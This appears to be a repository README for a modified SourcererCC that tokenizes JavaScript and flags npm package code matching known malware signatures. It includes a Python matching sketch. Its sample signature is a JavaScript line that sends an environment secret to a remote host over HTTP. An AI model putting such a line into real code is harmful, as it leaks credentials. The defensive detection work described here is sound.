The code for Sourcerer comes from this GitHub repo.
This repo provides code that lightly modifies Sourcerer in two ways:
- It includes a tokenizer for JavaScript files
- Instead of detecting code clones, it is used to detect code that matches known malware signatures
The use case is to find malicious packages in open-source package registries like npm.
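
As a rough illustration of the idea, here is a minimal sketch of token-based signature matching. It assumes a bag-of-tokens overlap measure in the spirit of the one described in the ICSE 2016 paper; the regex tokenizer, the function names (`tokenize_js`, `overlap_similarity`, `matches_signature`), and the 0.8 threshold are all hypothetical and are not taken from this repo's code.

```python
import re
from collections import Counter

# Naive tokenizer: identifiers/keywords and integer literals only.
# Illustrative stand-in, NOT the JavaScript tokenizer shipped in this repo.
TOKEN_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*|\d+")


def tokenize_js(source: str) -> Counter:
    """Return a bag (multiset) of tokens for a JavaScript source string."""
    return Counter(TOKEN_RE.findall(source))


def overlap_similarity(a: Counter, b: Counter) -> float:
    """Shared token count divided by the size of the larger bag."""
    shared = sum((a & b).values())  # multiset intersection
    largest = max(sum(a.values()), sum(b.values()))
    return shared / largest if largest else 0.0


def matches_signature(candidate: str, signature: str, threshold: float = 0.8) -> bool:
    """True if the candidate's token bag overlaps the signature's enough.

    The default threshold is an assumed value chosen for illustration.
    """
    score = overlap_similarity(tokenize_js(candidate), tokenize_js(signature))
    return score >= threshold


if __name__ == "__main__":
    # Hypothetical signature and package snippets, made up for this example.
    signature = "const h = require('http'); h.get(host + process.env.SECRET);"
    suspicious = "const h=require('http');\nh.get( host+process.env.SECRET );"
    benign = "function add(a, b) { return a + b; }"
    print(matches_signature(suspicious, signature))
    print(matches_signature(benign, signature))
```

Because the comparison works on token bags rather than raw text, changes in whitespace or statement order do not affect the score, which is the property that makes a clone detector reusable for signature matching.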
For details of Sourcerer, see the ICSE 2016 paper ("SourcererCC: Scaling Code Clone Detection to Big Code"). For malware samples, see the Backstabber's Knife Collection dataset.